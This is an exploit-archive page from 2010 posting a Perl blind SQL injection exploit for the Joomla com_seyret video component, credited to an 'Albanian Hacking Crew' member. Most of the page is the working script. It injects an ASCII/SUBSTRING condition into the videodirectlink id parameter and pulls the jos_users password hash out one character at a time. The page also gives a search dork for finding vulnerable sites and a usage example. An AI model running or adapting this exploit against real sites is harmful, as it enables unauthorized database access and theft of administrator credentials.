Home / os / win7

Joomla Component com_seyret Blind SQL Injection Vulnerabilit

Posted on 02 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla Component com_seyret Blind SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================= Joomla Component com_seyret Blind SQL Injection Vulnerability ============================================================= [+]Title :Joomla Component (com_seyret) Blind SQL Injection Exploit [+]Author :**RoAd_KiLlEr** [+]Contact :RoAd_KiLlEr[at]Khg-Crew[dot]Ws [+]Tested on :Win Xp Sp 2/3 --------------------------------------------------------------------------- [~] Founded by **RoAd_KiLlEr** [~] Team: Albanian Hacking Crew [~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws [~] Home: http://a-h-crew.net [~] Vendor:http://joomlaholic.com/ [~] Download App:http://joomlaholic.com/downloads/2-seyret-video-component ==========ExPl0iT3d by **RoAd_KiLlEr**========== [+]EXPLOIT: #!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { system(&quot;Title Albanian Hacking Crew&quot;); print &quot; &quot;; print &quot; ####################################################################### &quot;; print &quot; # Joomla Component (com_seyret) Blind SQL Injection Exploit &quot;; print &quot; # ----------------------------------------------------------- &quot;; print &quot; # Author: **RoAd_KiLlEr** &quot;; print &quot; # Greetz: Ton![W]indowS,X-n3t,b4cKd00r ~,DarkHacker.,The|DennY` &quot;; print &quot; # Site: www.a-h-crew.net &quot;; print &quot; # ----------------------------------------------------------- &quot;; print &quot; # Dork : inurl:com_seyret &quot;; print &quot; # Usage: perl exploit.pl host path &lt;options&gt; &quot;; print &quot; # Example: perl exploit.pl www.host.com /path/ -a 3 &quot;; print &quot; # ----------------------------------------------------------- &quot;; print &quot; # Options: &quot;; print &quot; # -a valid id &quot;; print &quot; ####################################################################### &quot;; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $userid = 1; my $aid = $ARGV[2]; my %options = (); GetOptions(\%options, &quot;u=i&quot;, &quot;p=s&quot;, &quot;a=i&quot;); print &quot;[~] Exploiting... &quot;; if($options{&quot;u&quot;}) { $userid = $options{&quot;u&quot;}; } if($options{&quot;a&quot;}) { $aid = $options{&quot;a&quot;}; } syswrite(STDOUT, &quot;[~] MD5-Hash: &quot;, 14); for(my $i = 1; $i &lt;= 32; $i++) { my $f = 0; my $h = 48; while(!$f &amp;&amp; $h &lt;= 57) { if(istrue2($host, $path, $userid, $aid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f &amp;&amp; $h &lt;= 122) { if(istrue2($host, $path, $userid, $aid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print &quot; [~] Exploiting done &quot;; sub istrue2 { my $host = shift; my $path = shift; my $uid = shift; my $aid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent-&gt;new; my $query = &quot;http://&quot;.$host.$path.&quot;index.php? option=com_seyret&amp;task=videodirectlink&amp;id=&quot;.$aid.&quot; and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),&quot;.$i.&quot;,1))=&quot;.$h.&quot;&quot;; if($options{&quot;p&quot;}) { $ua-&gt;proxy('http', &quot;http://&quot;.$options{&quot;p&quot;}); } my $resp = $ua-&gt;get($query); my $content = $resp-&gt;content; my $regexp = &quot;Back&quot;; if($content =~ /$regexp/) { return 1; } else { return 0; } } =========================================================================================== [!] Albanian Hacking Crew =========================================================================================== [!] **RoAd_KiLlEr** =========================================================================================== [!] MaiL: sukihack[at]gmail[dot]com =========================================================================================== [!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 &amp; All Albanian/Kosova Hackers =========================================================================================== [!] Spec Th4nks: Inj3ct0r.com &amp; r0073r | indoushka from Dz-Ghost Team | MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friendz =========================================================================================== [!] Red n'black i dress eagle on my chest It's good to be an ALBANIAN Keep my head up high for that flag I die Im proud to be an ALBANIAN =========================================================================================== # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-02]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP